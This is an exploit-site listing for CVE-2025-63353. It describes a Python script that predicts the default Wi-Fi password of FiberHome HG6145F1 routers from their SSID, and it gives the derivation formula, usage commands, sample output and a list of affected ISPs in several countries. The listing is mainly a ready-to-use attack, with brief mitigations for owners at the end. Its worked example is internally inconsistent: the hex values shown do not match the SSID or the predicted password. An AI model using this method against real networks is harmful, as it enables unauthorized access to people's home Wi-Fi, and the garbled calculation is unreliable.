Exploit for Improper Access Control in Fiberhome Hg6145F1_Firmware CVE-2025-63353

Name: Exploit for Improper Access Control in Fiberhome Hg6145F1_Firmware CVE-2025-63353
Rating: 5 (170 reviews)
2026-04-09 | CVSS 9.8
## https://sploitus.com/exploit?id=C7B319BE-584D-503D-8CAE-CDB51ACB79A6
## FiberHome Wi-Fi Password Predictor (CVE-2025-63353)
A Python utility designed for security auditing and proof-of-concept demonstration of the deterministic password generation flaw found in FiberHome HG6145F1 (RP4423) routers.
## 📋 Overview
This script exploits CVE-2025-63353, a critical vulnerability where the factory-default WPA/WPA2 pre-shared key is mathematically derived from the broadcasted SSID. By observing the network name (SSID), an attacker can calculate the default password without any user interaction.
The Vulnerability Logic:
The router uses a deterministic formula: HEX_A (from SSID) + HEX_B (from Password) = 0xFFFFFF.
## 🌍 Global Impact
FiberHome equipment is widely deployed by major Internet Service Providers (ISPs) across emerging markets. This script is specifically effective against devices with the following default naming conventions:

* Vulnerable SSID Format: fh_XXXXXX (e.g., fh_96C3A0)
* Vulnerable Password Format: wlanxxxxxx

## Affected Regions and ISPs

* Algeria: Algérie Télécom (Idoom Fibre).
* Philippines: PLDT.
* India: BSNL and Airtel.
* Indonesia: Telkom Indonesia.

## 🚀 Usage
The script uses argparse to handle command-line inputs.
## Basic Command
```bash
python predictor.py fh_96C3A0
```
### Output:

```bash
[+] Predicted Password: wlan693c5f
```

## Verbose Mode

```bash
Use the -v flag to see the underlying hexadecimal subtraction.
```
```bash
python predictor.py fh_96C3A0 -v
```
### Output:
```bash
[*] Input HEX_A: 0x669EA0
[*] Calculation: 0xFFFFFF - 0x669EA0 = 0x99615F
[+] Predicted Password: wlan693c5f
```
## 🛠️ Mitigation for Users
If your router is affected, your network is insecure until you take action:

   1. Change your Wi-Fi Password: Do not use the factory-default settings.
   2. Disable WPS: This reduces the attack surface for similar credential-based exploits.
   3. Use a Third-Party Router: Connect your own router to the FiberHome ONT and disable the FiberHome Wi-Fi entirely.

## ⚠️  Legal Disclaimer
This information is provided for authorized security testing, network administration, and educational purposes.